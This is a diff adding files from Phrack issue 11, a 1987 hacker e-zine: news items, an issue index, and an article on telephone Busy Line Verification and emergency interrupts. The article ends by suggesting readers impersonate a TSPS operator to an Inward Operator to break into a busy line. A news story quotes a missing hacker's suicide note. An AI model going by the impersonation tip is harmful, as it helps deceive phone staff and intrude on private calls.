PWN PWN
|
||||
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
||||
|
||||
On The Home Front December 25, 1986
|
||||
-----------------
|
||||
Happy Holidays to all from everyone at Phrack Inc. and Metal Shop Private!
|
||||
|
||||
Well, here we are at that time of year again and before too long we will have a
|
||||
new wave of self appointed hackers who got their modems for Christmas.
|
||||
|
||||
Some important dates to point out:
|
||||
|
||||
November 17, 1986............1st Anniversary of Phrack Inc.
|
||||
January 2, 1987..............1st Anniversary of Metal Shop being a PRIVATE BBS.
|
||||
January 10, 1987.............1st Anniversary of Metal Shop AE, now Quick Shop
|
||||
January 25, 1987.............1st Anniversary of Phrack World News
|
||||
|
||||
The Phrack Inc./Metal Shop Private Voice Mailbox is now back in operation. If
|
||||
you have a question for Taran King, Cheap Shades, or myself and cannot reach us
|
||||
through regular means, please leave us a message on our VMS.
|
||||
|
||||
Thanks to the efforts of Oryan Quest, an upcoming Phrack Pro-Phile will focus
|
||||
on Steve Wozniak.
|
||||
|
||||
Plans are already underway for Summer Con '87. It is to be held in St. Louis,
|
||||
Missouri during the last week of June. It is being sponsored by TeleComputist
|
||||
Newsletter, Phrack Inc., and Metal Shop Private. Forest Ranger is in charge of
|
||||
planning and is putting out a lot of front money for the necessary conference
|
||||
rooms and such. There will be a mandatory $10 admittance at the door to Summer
|
||||
Con '87. If you will be attending this conference, please as an act of
|
||||
good faith and to save 50% send $5 in early to:
|
||||
|
||||
J. Thomas
|
||||
TeleComputist Newsletter
|
||||
P.O. Box 2003
|
||||
Florissant, Missouri 63032-2003
|
||||
|
||||
Also, Letters to the Editor and anything else dealing with TeleComputist can be
|
||||
sent to the same address. TeleComputist can also be reached through Easylink
|
||||
at 62195770, MCI Telex at 650-240-6356, CIS at 72767,3207 and PLINK at OLS 631.
|
||||
Try MCI and Easylink first.
|
||||
|
||||
Not much else to say... so keep learning and try not to get into any trouble.
|
||||
|
||||
:Knight Lightning
|
||||
_______________________________________________________________________________
|
||||
|
||||
Computer Hackers Beware! - Senate Passes Computer Fraud And Abuse Act
|
||||
------------------------ ------------------------------------------
|
||||
On October 2, 1986, the US Senate unanimously passed the Computer Fraud and
|
||||
Abuse Act of 1986. The bill, S. 2281, imposes fines of up to $500,000 and/or
|
||||
prison terms of up to 20 years for breaking into government or financial
|
||||
institutions' computers.
|
||||
|
||||
The Federal Government alone operates more than 18,000 medium-scale and
|
||||
large-scale computers at some 4,500 different sites. The Office of Technology
|
||||
Assessment estimates the government's investment in computers over the past
|
||||
four years at roughly $60 million. The General Services Administration
|
||||
estimates that there will be 250,000 to 500,000 computers in use by the Federal
|
||||
Government by 1990.
|
||||
|
||||
In 1984, legislators' attention to and concern about computer fraud was
|
||||
heightened by a report by the American Bar Association task force on computer
|
||||
crime. According to the report, based on a survey of 1,000 private
|
||||
organizations and public agencies, forty-five percent of the 283 respondents
|
||||
had been victimized by some form of computer crime, and more than 25 percent
|
||||
had sustained financial losses totaling between an estimated $145 million and
|
||||
$730 million during one twelve month period.
|
||||
|
||||
To address this problem, the Senate and House enacted, in 1984, the first
|
||||
computer statute (18 U.S.C. 1030). Early this year both the House and Senate
|
||||
introduced legislation to expand and amend this statute.
|
||||
|
||||
In the current bill, which is expected to be signed by President Reagan next
|
||||
week, penalties will be imposed on anyone who knowingly or intentionally
|
||||
accesses a computer without authorization, or exceeds authorized access and:
|
||||
|
||||
(1) Obtains from government computers information relating to national defense
|
||||
and foreign relations.
|
||||
|
||||
(2) Obtains information contained in financial records of financial
|
||||
institutions.
|
||||
|
||||
(3) Affects the use of the government's operation of a computer in any
|
||||
department or agency of the government that is exclusively for the use of
|
||||
the U.S. Government.
|
||||
|
||||
(4) Obtains anything of value, unless the object of the fraud and the thing
|
||||
obtained consists only of the use of the computer.
|
||||
|
||||
(5) Alters, damages, or destroys information in any federal interest computer,
|
||||
or prevents authorized use of any such computer or information.
|
||||
|
||||
Under the bill, a person would be guilty of computer fraud if he or she causes
|
||||
a loss of $1,000 or more during any one year period.
|
||||
|
||||
Depending on the offense, penalties include fines up to $100,000 for a
|
||||
misdemeanor, $250,000 for a felony, $500,000 if the crime is committed by an
|
||||
organization, and prison terms of up to 20 years.
|
||||
|
||||
The bill also prohibits traffic in passwords and other information from
|
||||
computers used for interstate or foreign commerce. This part of the bill makes
|
||||
it possible for Federal Prosecutors to crack down on pirate bulletin boards and
|
||||
similar operations because the bill covers business computers, online networks,
|
||||
and online news and information services, all of which are considered
|
||||
interstate commerce.
|
||||
|
||||
Information provided by
|
||||
|
||||
P - 8 0 S y s t e m s
|
||||
_______________________________________________________________________________
|
||||
|
||||
GTE News December 20, 1986
|
||||
--------
|
||||
"GTE Develops High-Speed GaAs Multiplexer Combining Four Data Channels"
|
||||
|
||||
In an effort to achieve data communication rates of several gigabits per
|
||||
second, GTE Labs (Waltham, MA) is combining the high-capacity of fiber optics
|
||||
with the high speed of gallium arsenide circuits. The research arm of GTE has
|
||||
designed a GaAs multiplexer that can combine four data channels, each with a
|
||||
communication rate of 1 gigabit per second, into one channel. GTE has also
|
||||
recently developed a technique called MOVPE (metal-organic vapor-phase
|
||||
epitaxy) for efficiently growing thin-film GaAs crystals.
|
||||
|
||||
The new devices should play an important role in future communication systems,
|
||||
which will involve high-capacity fiber-optic cables connecting houses and
|
||||
offices through telephone switching centres. Data rates on these cables could
|
||||
be as high as 20 gigabits per second. In addition to standard computer data,
|
||||
numerous video channels could be supported, each with a data rate of almost
|
||||
100 megabits per second. The GaAs multiplexers will probably be the only
|
||||
devices fast enough to interface houses and offices through this fiber-optic
|
||||
grid. In future supercomputers [misuse of the word -eds.] these multiplexers
|
||||
will also be used for high-speed fiber-optic transmissions between various
|
||||
boards in the computer, replacing copper wires. Because of the high-speed
|
||||
nature of the fiber-optic link, such techniques may even be used for chip-to-
|
||||
chip communication.
|
||||
|
||||
GTE said it has completed a prototype of the GaAs multiplexer and a final
|
||||
version should be ready in less than a year.
|
||||
|
||||
Comments: And meanwhile, while GTE's been building gigabit/second
|
||||
multiplexers, AT&T Bell Labs is still experimenting with the neuron
|
||||
webs from slug brains...
|
||||
|
||||
Information from Byte Magazine, December 1986, Page 9
|
||||
|
||||
Typed & Commented on by Mark Tabas
|
||||
_______________________________________________________________________________
|
||||
|
||||
The LOD/H Technical Journal
|
||||
---------------------------
|
||||
The Legion Of Doom/Hackers Technical Journal is a soft-copy free newsletter
|
||||
whose primary purpose is to further the knowledge of those who are interested
|
||||
in topics such as: Telecommunications, Datacommunications, Computer & Physical
|
||||
Security/Insecurity and the various technical aspects of the phone system.
|
||||
|
||||
The articles are totally original unless otherwise stated. All sources of
|
||||
information for a specific article are listed in the introduction or conclusion
|
||||
of the article. They will not accept any articles that are unoriginal,
|
||||
plagiarized, or contain invalid or false information. Articles will be
|
||||
accepted from anyone who meets those criteria. They are not dependant upon
|
||||
readers for articles, since members of LOD/H and a select group of others will
|
||||
be the primary contributors, but anyone can submit articles.
|
||||
|
||||
There is no set date for releasing issues, as they have no monetary or legal
|
||||
obligation to the readers, but they predict that issues will be released
|
||||
every 2 or 3 months. Thus, expect 4 to 6 issues a year assuming that they
|
||||
continue to produce them, which they intend to do.
|
||||
|
||||
The bulletin boards sponsoring the LOD/H TJs include:
|
||||
|
||||
Atlantis
|
||||
Digital Logic Data Service
|
||||
Hell Phrozen Over (HPO)
|
||||
Metal Shop Private
|
||||
Private Sector
|
||||
The Shack //
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
The first issue will include these articles;
|
||||
|
||||
- Introduction to the LOD/H Technical Journal and Table Of Contents
|
||||
|
||||
- Editorial: "Is the law a deterrent to computer crime?" by Lex Luthor
|
||||
|
||||
- Local Area Signalling Services (LASS) by The Videosmith
|
||||
|
||||
- Identifying and Defeating Physical Security and Intrusion Detection Systems
|
||||
Part I: The Perimeter by Lex Luthor
|
||||
|
||||
- Traffic Service Position System (TSPS) by The Marauder
|
||||
|
||||
- Hacking DEC's TOPS-20: Intro by Blue Archer
|
||||
|
||||
- Building your own Blue Box (Includes Schematic) by Jester Sluggo
|
||||
|
||||
- Intelligence and Interrogation Processes by Master Of Impact
|
||||
|
||||
- The Outside Loop Distribution Plant: Part I by Phucked Agent 04
|
||||
|
||||
- The Outside Loop Distribution Plant: Part II by Phucked Agent 04
|
||||
|
||||
- LOH Telenet Directory: Update #4 (12-9-86) Part I by LOH
|
||||
|
||||
- LOH Telenet Directory: Update #4 (12-9-86) Part II by LOH
|
||||
|
||||
- Network News & Notes by "Staff"
|
||||
|
||||
That's a total of 13 files...
|
||||
|
||||
That ends the preview, the newsletter is due to be released by January 1, 1987
|
||||
so watch for it!
|
||||
Information Provided by
|
||||
|
||||
Lex Luthor & The Legion Of Doom/Hackers Technical Journal Staff
|
||||
_______________________________________________________________________________
|
||||
|
||||
Texas Rumors Run Rampant December 24, 1986
|
||||
------------------------
|
||||
Remember all that controversy about Sir Gamelord being Videosmith?
|
||||
|
||||
Well here's the story...
|
||||
|
||||
It all started on a conference bridge, where a number of people including Evil
|
||||
Jay, Line Breaker [who, indirectly started all of this], and Blade Runner among
|
||||
others were having a discussion.
|
||||
|
||||
Line Breaker was telling a story of how Videosmith was a fed, how Videosmith
|
||||
had busted everyone at a phreak con (or something like that), and how he [Line
|
||||
Breaker] and some other people called Videosmith up, pretending to be feds, and
|
||||
got him to admit that he did these things.
|
||||
|
||||
Blade Runner was terribly pissed at Sir Gamelord (who had recently attempted to
|
||||
take over P.H.I.R.M., which is Blade Runner's group). As a retaliatory strike
|
||||
and after hearing this slander upon Videosmith's name, Blade Runner started
|
||||
telling people that Sir Gamelord was Videosmith. The stories have been getting
|
||||
more and more exaggerated since then but that is all that really happened.
|
||||
|
||||
[They say everything is bigger in Texas...I guess that includes bullshit too!]
|
||||
|
||||
Information Provided by Evil Jay
|
||||
_______________________________________________________________________________
|
||||
|
||||
The Cracker Disappears December 27, 1986
|
||||
----------------------
|
||||
The rumors and stories are flying around about the disappearance of one
|
||||
Bill Landreth aka The Cracker.
|
||||
|
||||
Bill Landreth is the author of "Out Of The Inner Circle," a book on hackers
|
||||
that was published a few years back.
|
||||
|
||||
According to newspaper articles in the San Francisco area, Bill was at a
|
||||
friend's home working on some computer program. His friend stepped out for a
|
||||
while and when he returned, there was a lot of garbage on screen and a suicide
|
||||
message.
|
||||
|
||||
On Ripco BBS, message was posted about Bill Landreth, stating that he had
|
||||
disappeared, and was once again wanted by the FBI. The message asked that
|
||||
anyone in contact with Bill would tell him to contact his "friends."
|
||||
|
||||
Most of what is going on right now is bogus rumors. There may be a follow up
|
||||
story in the next PWN.
|
||||
|
||||
Information Provided By
|
||||
|
||||
The Prophet/Sir Frances Drake/Elric Of Imrryr
|
||||
_______________________________________________________________________________
|
||||
|
||||
U.S. Sprint Screws Up December 24, 1986
|
||||
---------------------
|
||||
Taken From the Fort Lauderdale Sun Sentinal
|
||||
|
||||
"He got a 1,400 page bill!"
|
||||
|
||||
In Montrose, Colorado, Brad Switzer said he thought the box from the U.S.
|
||||
Sprint Long Distance Company was an early Christmas present until he opened it
|
||||
and found that it contained a 1,400 page phone bill.
|
||||
|
||||
The $34,000 bill was delivered to Switzer's doorstep Monday. He called U.S.
|
||||
Sprint's Denver office, where company officials assured him he was "Off the
|
||||
Hook." A spokesman for U.S. Sprint said that Switzer had mistakenly received
|
||||
U.S. Sprint's own phone bill for long distance calls.
|
||||
|
||||
Typed For PWN by The Leftist
|
||||
_______________________________________________________________________________
|
||||
|
32
phrack11/1.txt
Normal file
32
phrack11/1.txt
Normal file
|
@ -0,0 +1,32 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue Eleven, Phile #1 of 12
|
||||
|
||||
Index
|
||||
~~~~~
|
||||
2/17/87
|
||||
|
||||
Welcome to Issue Eleven of the Phrack Inc. electronic newsletter.
|
||||
This issue, I was a bit more reliable about getting the issue out (yes, only 3
|
||||
days late!). This issue did not come together as easily as I would have hoped
|
||||
due to a number of people being difficult to get a hold of or getting their
|
||||
files, but I filled their places in with other files, so if you had been told
|
||||
you would have a file in this issue, get in contact with me so that it will be
|
||||
featured in Issue Twelve. The following files are featured in this edition of
|
||||
Phrack Inc.:
|
||||
|
||||
#1 Index to Phrack Eleven by Taran King (1.7K)
|
||||
#2 Phrack Pro-Phile VIII on Wizard of Arpanet by Taran King (6.8K)
|
||||
#3 PACT: Prefix Access Code Translator by The Executioner (7.6K)
|
||||
#4 Hacking Voice Mail Systems by Black Knight from 713 (6.0K)
|
||||
#5 Simple Data Encryption or Digital Electronics 101 by The Leftist (4.1K)
|
||||
#6 AIS - Automatic Intercept System by Taran King (15.9K)
|
||||
#7 Hacking Primos I, II, III by Evil Jay (6.7K)
|
||||
#8 Telephone Signalling Methods by Doom Prophet (7.3K)
|
||||
#9 Cellular Spoofing By Electronic Serial Numbers donated by Amadeus (15.2K)
|
||||
#10 Busy Line Verification by Phantom Phreaker (10.0K)
|
||||
#11 Phrack World News X by Knight Lightning
|
||||
#12 Phrack World News XI by knight Lightning
|
||||
|
||||
Taran King
|
||||
Sysop of Metal Shop Private
|
157
phrack11/10.txt
Normal file
157
phrack11/10.txt
Normal file
|
@ -0,0 +1,157 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue Eleven, Phile #10 of 12
|
||||
|
||||
BUSY LINE VERIFICATION
|
||||
|
||||
WRITTEN BY PHANTOM PHREAKER
|
||||
|
||||
|
||||
This file describes how a TSPS operator does a BLV (Busy Line
|
||||
Verification) and an EMER INT (Emergency Interrupt) upon a busy line that a
|
||||
customer has requested to be 'broken' into. I have written this file to
|
||||
hopefully clear up all the misconceptions about Busy Line Verification and
|
||||
Emergency Interrupts.
|
||||
|
||||
BLV is 'Busy Line Verification'. That is, discovering if a line is
|
||||
busy/not busy. BLV is the telco term, but it has been called Verification,
|
||||
Autoverify, Emergency Interrupt, break into a line, REMOB, and others. BLV is
|
||||
the result of a TSPS that uses a Stored Program Control System (SPCS) called
|
||||
the Generic 9 program. Before the rise of TSPS in 1969, cordboard operators
|
||||
did the verification process. The introduction of BLV via TSPS brought about
|
||||
more operator security features. The Generic 9 SPCS and hardware was first
|
||||
installed in Tucson, Daytona, and Columbus, Ohio, in 1979. By now virtually
|
||||
every TSPS has the Generic 9 program.
|
||||
|
||||
A TSPS operator does the actual verification. If caller A was in the 815
|
||||
Area code, and caller B was in the 314 Area code, A would dial 0 to reach a
|
||||
TSPS in his area code, 815. Now, A, the customer, would tell the operator he
|
||||
wished an emergency interrupt on B's number, 314+555+1000. The 815 TSPS op who
|
||||
answered A's call cannot do the interrupt outside of her own area code, (her
|
||||
service area), so she would call an Inward Operator for B's area code, 314,
|
||||
with KP+314+TTC+121+ST, where the TTC is a Terminating Toll Center code that
|
||||
is needed in some areas. Now a TSPS operator in the 314 area code would be
|
||||
reached by the 815 TSPS, but a lamp on the particular operators console would
|
||||
tell her she was being reached with an Inward routing. The 815 operator then
|
||||
would say something along the lines of she needed an interrupt on
|
||||
314+555+1000, and her customers name was J. Smith. Now, the 314 Inward (which
|
||||
is really a TSPS) would dial B's number, in a normal Operator Direct Distance
|
||||
Dialing (ODDD) fashion. If the line wasn't busy, then the 314 Inward would
|
||||
report this to the 815 TSPS, who would then report to the customer (caller A)
|
||||
that 314+555+1000 wasn't busy and he could call as normal. However if the
|
||||
given number (in this case, 314+555+1000) was busy, then several things would
|
||||
happen and the process of BLV and EMER INT would begin. The 314 Inward would
|
||||
seize a Verification trunk (or BLV trunk) to the toll office that served the
|
||||
local loop of the requested number (555+1000). Now another feature of TSPS
|
||||
checks the line asked to be verified against a list of lines that can't be
|
||||
verified, such as radio stations, police, etc. If the line number a customer
|
||||
gives is on the list then the verification cannot be done, and the operator
|
||||
tells the customer.
|
||||
|
||||
Now the TSPS operator would press her VFY (VeriFY) key on the TSPS
|
||||
console, and the equipment would outpulse (onto the BLV trunk)
|
||||
KP+0XX+PRE+SUFF+ST. The KP being Key Pulse, the 0XX being a 'screening code'
|
||||
that protects against trunk mismatching, the PRE being the Prefix of the
|
||||
requested number (555), the SUFF being the Suffix of the requested number
|
||||
(1000), and the ST being STart, which tells the Verification trunk that no
|
||||
more MF digits follow. The screening code is there to keep a normal Toll
|
||||
Network (used in regular calls) trunk from accidentally connecting to a
|
||||
Verification trunk. If this screening code wasn't present, and a trunk
|
||||
mismatch did occur, someone calling a friend in the same area code might just
|
||||
happen to be connected to his friends line, and find himself in the middle of
|
||||
a conversation. But, the Verification trunk is waiting for an 0XX sequence,
|
||||
and a normal call on a Toll Network trunk does not outpulse an 0XX first.
|
||||
(Example: You live at 914+555+1000, and wish to call 914+666+0000. The routing
|
||||
for your call would be KP+666+0000+ST. The BLV trunk cannot accept a 666 in
|
||||
place of the proper 0XX routing, and thus would give the caller a re-order
|
||||
tone.) Also, note that the outpulsing sequence onto a BLV trunk can't contain
|
||||
an Area Code. This is the reason why if a customer requests an interrupt
|
||||
outside of his own NPA, the TSPS operator must call an Inward for the area
|
||||
code that can outpulse onto the proper trunk. If a TSPS in 815 tried to do an
|
||||
interrupt on a trunk in 314, it would not work. This proves that there is a
|
||||
BLV network for each NPA, and if you somehow gain access to a BLV trunk, you
|
||||
could only use it for interrupts within the NPA that the trunk was located in.
|
||||
|
||||
BLV trunks 'hunt' to find the right trunks to the right Class 5 End Office
|
||||
that serves the given local loop. The same outpulsing sequence is passed along
|
||||
BLV trunks until the BLV trunk serving the Toll Office that serves the given
|
||||
End Office is found.
|
||||
|
||||
There is usually one BLV trunk per 10,000 lines (exchange). So, if a Toll
|
||||
Office served ten End Offices, that Toll Office would have 100,000 local loops
|
||||
that it served, and have 10 BLV trunks running from TSPS to that Toll Office.
|
||||
|
||||
Now, the operator (in using the VFY key) can hear what is going on on the
|
||||
line, (modem, voice, or a permanent signal, indicating a phone off-hook) and
|
||||
take appropriate action. She can't hear what's taking place on the line
|
||||
clearly, however. A speech scrambler circuit within the operator console
|
||||
generates a scramble on the line while the operator is doing a VFY. The
|
||||
scramble is there to keep operators from listening in on people, but it is not
|
||||
enough to keep an op from being able to tell if a conversation, modem signal,
|
||||
or a dial tone is present upon the line. If the operator hears a permanent
|
||||
signal, she can only report back to the customer that either the phone is
|
||||
off-hook, or there is a problem with the line, and she can't do anything about
|
||||
it. In the case of caller A and B, the 314 Inward would tell the 815 TSPS, and
|
||||
the 815 TSPS would tell the customer. If there is a conversation on line, the
|
||||
operator presses a key marked EMER INT (EMERgency INTerrupt) on her console.
|
||||
This causes the operator to be added into a three way port on the busy line.
|
||||
The EMER INT key also deactivates the speech scrambling circuit and activates
|
||||
an alerting tone that can be heard by the called customer. The alerting tone
|
||||
that is played every 10 seconds tells the customer that an operator is on the
|
||||
line. Some areas don't have the alerting tone, however. Now, the operator
|
||||
would say 'Is this XXX-XXXX?' where XXX-XXXX would be the Prefix and Suffix of
|
||||
the number that the original customer requesting the interrupt gave the
|
||||
original TSPS. The customer would confirm the operator had the correct line.
|
||||
Then the Op says 'You have a call waiting from (customers name). Will you
|
||||
accept?'. This gives the customer the chance to say 'Yes' and let the calling
|
||||
party be connected to him, while the previous party would be disconnected. If
|
||||
the customer says 'No', then the operator tells the person who requested the
|
||||
interrupt that the called customer would not accept. The operator can just
|
||||
inform the busy party that someone needed to contact him or her, and have the
|
||||
people hang up, and then notify the requesting customer that the line is free.
|
||||
Or, the operator can connect the calling party and the interrupted party
|
||||
without loss of connection.
|
||||
|
||||
The charges for this service (in my area at least) run 1.00 for asking the
|
||||
operator to interrupt a phone call so you can get through. There is an .80
|
||||
charge if you ask the operator to verify whether the phone you're trying to
|
||||
reach is busy because of a service problem or because of a conversation. If
|
||||
the line has no conversation on it, there will be no charge for the
|
||||
verification.
|
||||
|
||||
When the customer who initiated the emergency interrupt gets his telephone
|
||||
bill, the charges for the interrupt call will look similar to this:
|
||||
|
||||
12-1 530P INTERRUPT CL 314 555 1000 OD 1 1.00
|
||||
|
||||
The 12-1 is December first of the current year; 530P is the time the call
|
||||
was made to the operator requesting an interrupt; INTERRUPT CL is what took
|
||||
place, that is, an interrupt call; 314 555 1000 is the number requested; OD
|
||||
stands for Operator Dialed; the 1 is the length of the call (in minutes); and
|
||||
the 1.00 is the charge for the interrupt. The format may be different,
|
||||
depending upon your area and telephone company.
|
||||
|
||||
One thing I forgot to mention about TSPS operators. In places where a
|
||||
Remote Trunking Arrangement is being used, and even places where they aren't
|
||||
in use, you may be connected to a TSPS operator in a totally different area
|
||||
code. In such a case, the TSPS that you reach in a Foreign NPA will call up an
|
||||
inward operator for your Home NPA, if the line you requested an EMER INT on
|
||||
was in your HNPA. If the line you requested EMER INT on was in the same NPA of
|
||||
the TSPS that you had reached, then no inward operator would be needed and the
|
||||
answering operator could do the entire process.
|
||||
|
||||
Verification trunks seem to be only accessible by a TSPS/Inward operator.
|
||||
However, there have been claims to people doing Emergency Interrupts with blue
|
||||
boxes. I don't know how to accomplish an EMER INT without the assistance of an
|
||||
operator, and I don't know if it can be done. If you really wish to
|
||||
participate in a BLV/EMER INT, call up an Inward Operator and play the part of
|
||||
a TSPS operator who needs an EMER INT upon a pre-designated busy line. Billing
|
||||
is handled at the local TSPS so you will not have to supply a billing number
|
||||
if you decide to do this.
|
||||
|
||||
|
||||
If you find any errors in this file, please try to let me know about it,
|
||||
and if you find out any other information that I haven't included, feel free
|
||||
to comment.
|
||||
|
||||
-End of file-
|
385
phrack11/11.txt
Normal file
385
phrack11/11.txt
Normal file
|
@ -0,0 +1,385 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue Eleven, Phile #11 of 12
|
||||
|
||||
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
||||
PWN PWN
|
||||
PWN *>=-{ Phrack World News }-=<* PWN
|
||||
PWN PWN
|
||||
PWN Issue X PWN
|
||||
PWN PWN
|
||||
PWN Written, Compiled, and Edited PWN
|
||||
PWN by Knight Lightning PWN
|
||||
PWN PWN
|
||||
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
||||
|
||||
Scan Man Revisited January 19, 1987
|
||||
------------------
|
||||
The following is a reprint from TeleComputist Newsletter Issue Two;
|
||||
|
||||
SCAN MAN - FED OR PHREAK? (The Other Side)
|
||||
|
||||
TeleComputist is printing the statement Scan Man has made to us
|
||||
[TeleComputist] in rebuttal to Phrack World News, whom previously printed an
|
||||
article concerning Scan Man in Phrack Issue VIII. Those of you who have seen
|
||||
or read the article in Phrack VIII know that it basically covered information
|
||||
and an intercepted memo alleging Scan Man of going after hackers and turning
|
||||
in codes off his BBS (P-80 Systems, Charleston, West Virginia 304/744-2253) as
|
||||
a TMC employee. Please note that this statement should be read with the
|
||||
article concerning Scan Man in Phrack Issue VIII to get the full
|
||||
understanding.
|
||||
|
||||
Scan Man started off his statement claiming not to work for TMC, but
|
||||
instead for a New York branch office of Telecom Management (a Miami based
|
||||
firm). He was flown in from Charleston, West Virginia to New York every week
|
||||
for a four to five day duration. Once in New York, Telecom Management made
|
||||
available a leased executive apartment where Scan Man stayed as he worked.
|
||||
His position in Telecom Management was that of a systems analyst, "...and that
|
||||
was it!" Scan Man stated. Scan Man also stated that he had never made it a
|
||||
secret that he was working in New York and had even left messages on his BBS
|
||||
saying this.
|
||||
|
||||
He also went on to say that he had no part in the arrest of Shawn [of
|
||||
Phreaker's Quest] (previously known as Captain Caveman) by TMC in Las Vegas.
|
||||
Scan Man claimed to have no ties with TMC in Las Vegas and that they would not
|
||||
even know him. Scan Man then went on to say that Shawn had never replied to
|
||||
previous messages Scan man had left asking for TMC codes. Scan Man also said
|
||||
that the messages about TMC were in no way related to him. He claimed to have
|
||||
no ties to TMC, which is a franchised operation which makes even TMC unrelated
|
||||
except by name.
|
||||
|
||||
Scan Man stated that he called Pauline Frazier and asked her about the
|
||||
inquiry by Sally Ride [:::Space Cadet] who acted as an insider to obtain the
|
||||
information in Phrack VIII. He said that Pauline said nothing to the imposter
|
||||
(Sally Ride) and merely directed him to a TMC employee named Kevin Griffo.
|
||||
Scan Man then went on to say that the same day Sally Ride called Pauline
|
||||
Frazier was the same day he received his notice. And to that Scan Man made
|
||||
the comment, "If I find out this is so heads will roll!"
|
||||
|
||||
After that comment, Scan Man came up with arguments of his own, starting
|
||||
off with the dates printed in Phrack VIII. He claimed that the dates were off
|
||||
and backed this up by saying Ben Graves had been fired six months previously
|
||||
to the conversation with Sally Ride. Scan Man then went on to ask why it had
|
||||
taken Sally Ride so long to come forward with his information. Scan Man made
|
||||
one last comment, "It's a fucking shame that there is a social structure in
|
||||
the phreak world!" Meaning Sally Ride merely presented his information to
|
||||
give himself a boost socially in the phreak world.
|
||||
|
||||
This is how it ended. We would like to say that TeleComputist printed the
|
||||
statement by Scan Man to offer both sides of the story. We make no judgements
|
||||
here and take no sides.
|
||||
|
||||
Reprinted with permission from TeleComputist Newsletter Issue 2
|
||||
|
||||
Copyright (C) 1986 by J. Thomas. All Rights Reserved
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
Ok, that was Scan Man's side to the story, now that he had a few months to
|
||||
come up with one. Lets do a critical breakdown;
|
||||
|
||||
-*- "He was flown in from Charleston, West Virginia to New York every week for
|
||||
a four to five day duration."
|
||||
|
||||
Gee, wouldn't that get awfully expensive? Every week...and "made
|
||||
available a leased executive apartment..." He must have been quite an
|
||||
asset to "Telecom Management" for them to spend such large amounts on him.
|
||||
Kinda interesting that he lived in Charleston, West Virginia (where
|
||||
surprisingly enough there is a branch of TMC) and flew to New York every
|
||||
week.
|
||||
|
||||
-*- "Scan Man claimed to have no ties with TMC in Las Vegas..." Ok, I'll buy
|
||||
that. Notice how he didn't say that he had no ties with TMC in
|
||||
Charleston. Furthermore if he had no ties with TMC in Charleston why
|
||||
would they have his name in their company records? Why would all those
|
||||
employees know him or dislike him for that matter?
|
||||
|
||||
-*- "Scan Man then went on to say that the same day Sally Ride called Pauline
|
||||
Frazier was the day he received his notice." Well now, how can there be a
|
||||
connection between the two events at all when Scan Man works for Telecom
|
||||
Management and has "no ties with TMC" and claimed "not to work for TMC"?
|
||||
If TMC and Telecom Management are truly independent of each other then
|
||||
nothing Sally Ride said to Pauline Frazier could have affected him in ANY
|
||||
way. That is unless he did work for TMC in the first place.
|
||||
|
||||
-*- "...and back this up by saying that Ben Graves had been fired six months
|
||||
previously to the conversation with Sally Ride." Well first of all, PWN
|
||||
did not give a date as to when Ben Graves was fired from TMC. Second of
|
||||
all and more important, how does Scan Man know so much about TMC when he
|
||||
works for "Telecom Management" and has "...no ties with TMC..."?
|
||||
|
||||
The rest of his statements were highly debatable and he showed no proof as to
|
||||
their validity. As for why Sally Ride waited so long to come forward, well he
|
||||
didn't wait that long at all, he came forward to myself in late May/early June
|
||||
of 1986. My decision was to do nothing because there wasn't enough proof.
|
||||
After three months of research we had enough proof and the article was
|
||||
released.
|
||||
|
||||
With this attempt to cover up the truth, Scan Man has only given more
|
||||
ammunition to the idea that he isn't what he claims to be.
|
||||
|
||||
Special Thanks to TeleComputist Newsletter
|
||||
______________________________________________________________________________
|
||||
|
||||
The Cracker Cracks Up? December 21, 1986
|
||||
----------------------
|
||||
"Computer 'Cracker' Is Missing -- Is He Dead Or Is He Alive"
|
||||
|
||||
By Tom Gorman of The Los Angeles Times
|
||||
|
||||
ESCONDIDO, Calif. -- Early one morning in late September, computer hacker Bill
|
||||
Landreth pushed himself away from his IBM-PC computer -- its screen glowing
|
||||
with an uncompleted sentence -- and walked out the front door of a friend's
|
||||
home here.
|
||||
|
||||
He has not been seen or heard from since.
|
||||
|
||||
The authorities want him because he is the "Cracker", convicted in 1984 of
|
||||
breaking into some of the most secure computer systems in the United States,
|
||||
including GTE Telemail's electronic mail network, where he peeped at NASA
|
||||
Department of Defense computer correspondence.
|
||||
|
||||
He was placed on three years' probation. Now his probation officer is
|
||||
wondering where he is.
|
||||
|
||||
His literary agent wants him because he is Bill Landreth the author, who
|
||||
already has cashed in on the successful publication of one book on computer
|
||||
hacking and who is overdue with the manuscript of a second computer book.
|
||||
|
||||
The Institute of Internal Auditors wants him because he is Bill Landreth the
|
||||
public speaker who was going to tell the group in a few months how to make
|
||||
their computer systems safer from people like him.
|
||||
|
||||
Susan and Gulliver Fourmyle want him because he is the eldest of their eight
|
||||
children. They have not seen him since May 1985, when they moved away from
|
||||
Poway in northern San Diego county, first to Alaska then to Maui where they
|
||||
now live.
|
||||
|
||||
His friends want him because he is crazy Bill Landreth, IQ 163, who has pulled
|
||||
stunts like this before and "disappeared" into the night air -- but never for
|
||||
more than a couple of weeks and surely not for 3 months. They are worried.
|
||||
|
||||
Some people think Landreth, 21, has committed suicide. There is clear
|
||||
evidence that he considered it -- most notably in a rambling eight-page
|
||||
discourse that Landreth wrote during the summer.
|
||||
|
||||
The letter, typed into his computer, then printed out and left in his room for
|
||||
someone to discover, touched on the evolution of mankind, prospects for man's
|
||||
immortality and the defeat of the aging process, nuclear war, communism versus
|
||||
capitalism, society's greed, the purpose of life, computers becoming more
|
||||
creative than man and finally -- suicide.
|
||||
|
||||
The last page reads:
|
||||
|
||||
"As I am writing this as of the moment, I am obviously not dead. I do,
|
||||
however, plan on being dead before any other humans read this. The idea is
|
||||
that I will commit suicide sometime around my 22nd birthday..."
|
||||
|
||||
The note explained:
|
||||
|
||||
"I was bored in school, bored traveling around the country, bored getting
|
||||
raided by the FBI, bored in prison, bored writing books, bored being bored. I
|
||||
will probably be bored dead, but this is my risk to take."
|
||||
|
||||
But then the note said:
|
||||
|
||||
